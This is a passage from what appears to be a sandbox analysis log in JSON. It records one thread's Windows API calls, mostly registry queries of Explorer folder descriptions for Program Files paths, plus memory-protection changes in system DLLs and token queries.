            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000294"
              },
              {
                "name": "SubKey",
                "value": "{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}"
              },
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}"
              }
            ],
            "repeated": 0,
            "id": 475
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000294"
              }
            ],
            "repeated": 0,
            "id": 476
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "Category"
              },
              {
                "name": "Data",
                "value": "2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Category"
              }
            ],
            "repeated": 0,
            "id": 477
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "ProgramFilesX86"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Name"
              }
            ],
            "repeated": 0,
            "id": 478
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "ParentFolder"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\ParentFolder"
              }
            ],
            "repeated": 0,
            "id": 479
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "Description"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Description"
              }
            ],
            "repeated": 0,
            "id": 480
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "RelativePath"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\RelativePath"
              }
            ],
            "repeated": 0,
            "id": 481
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "ParsingName"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\ParsingName"
              }
            ],
            "repeated": 0,
            "id": 482
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "InfoTip"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\InfoTip"
              }
            ],
            "repeated": 0,
            "id": 483
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "LocalizedName"
              },
              {
                "name": "Data",
                "value": "@%SystemRoot%\\system32\\shell32.dll,-21817"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\LocalizedName"
              }
            ],
            "repeated": 0,
            "id": 484
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "Icon"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Icon"
              }
            ],
            "repeated": 0,
            "id": 485
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "Security"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Security"
              }
            ],
            "repeated": 0,
            "id": 486
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "StreamResource"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\StreamResource"
              }
            ],
            "repeated": 0,
            "id": 487
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "StreamResourceType"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\StreamResourceType"
              }
            ],
            "repeated": 0,
            "id": 488
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "LocalRedirectOnly"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\LocalRedirectOnly"
              }
            ],
            "repeated": 0,
            "id": 489
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "Roamable"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Roamable"
              }
            ],
            "repeated": 0,
            "id": 490
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "PreCreate"
              },
              {
                "name": "Data",
                "value": "1"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\PreCreate"
              }
            ],
            "repeated": 0,
            "id": 491
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "Stream"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Stream"
              }
            ],
            "repeated": 0,
            "id": 492
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "PublishExpandedPath"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\PublishExpandedPath"
              }
            ],
            "repeated": 0,
            "id": 493
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "DefinitionFlags"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\DefinitionFlags"
              }
            ],
            "repeated": 0,
            "id": 494
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "Attributes"
              },
              {
                "name": "Data",
                "value": "1"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Attributes"
              }
            ],
            "repeated": 0,
            "id": 495
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "FolderTypeID"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\FolderTypeID"
              }
            ],
            "repeated": 0,
            "id": 496
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "InitFolderHandler"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\InitFolderHandler"
              }
            ],
            "repeated": 0,
            "id": 497
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedf3e6000"
              },
              {
                "name": "ModuleName",
                "value": "windows.storage.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 498
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedf3e6000"
              },
              {
                "name": "ModuleName",
                "value": "windows.storage.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 499
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000298"
              },
              {
                "name": "SubKey",
                "value": "PropertyBag"
              },
              {
                "name": "Handle",
                "value": "0x00000294"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\PropertyBag"
              }
            ],
            "repeated": 0,
            "id": 500
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              }
            ],
            "repeated": 0,
            "id": 501
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\Windows\\CurrentVersion"
              },
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion"
              }
            ],
            "repeated": 0,
            "id": 502
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "ProgramFilesDir (x86)"
              },
              {
                "name": "Data",
                "value": "C:\\Program Files (x86)"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProgramFilesDir (x86)"
              }
            ],
            "repeated": 0,
            "id": 503
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              }
            ],
            "repeated": 0,
            "id": 504
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000290"
              }
            ],
            "repeated": 0,
            "id": 505
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2a56000"
              },
              {
                "name": "ModuleName",
                "value": "SHELL32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 506
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2a56000"
              },
              {
                "name": "ModuleName",
                "value": "SHELL32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 507
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtOpenProcessToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000008"
              },
              {
                "name": "TokenHandle",
                "value": "0x00000290"
              }
            ],
            "repeated": 0,
            "id": 508
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "29"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 509
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "25"
              },
              {
                "name": "TokenInformation",
                "value": "p\\xc0\\x7f\\x00\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 510
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions"
              },
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions"
              }
            ],
            "repeated": 0,
            "id": 511
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000298"
              },
              {
                "name": "SubKey",
                "value": "{6D809377-6AF0-444B-8957-A3773F02200E}"
              },
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444B-8957-A3773F02200E}"
              }
            ],
            "repeated": 0,
            "id": 512
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              }
            ],
            "repeated": 0,
            "id": 513
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "Category"
              },
              {
                "name": "Data",
                "value": "2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Category"
              }
            ],
            "repeated": 0,
            "id": 514
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "ProgramFilesX64"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Name"
              }
            ],
            "repeated": 0,
            "id": 515
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "ParentFolder"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\ParentFolder"
              }
            ],
            "repeated": 0,
            "id": 516
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "Description"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Description"
              }
            ],
            "repeated": 0,
            "id": 517
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "RelativePath"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\RelativePath"
              }
            ],
            "repeated": 0,
            "id": 518
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "ParsingName"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\ParsingName"
              }
            ],
            "repeated": 0,
            "id": 519
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
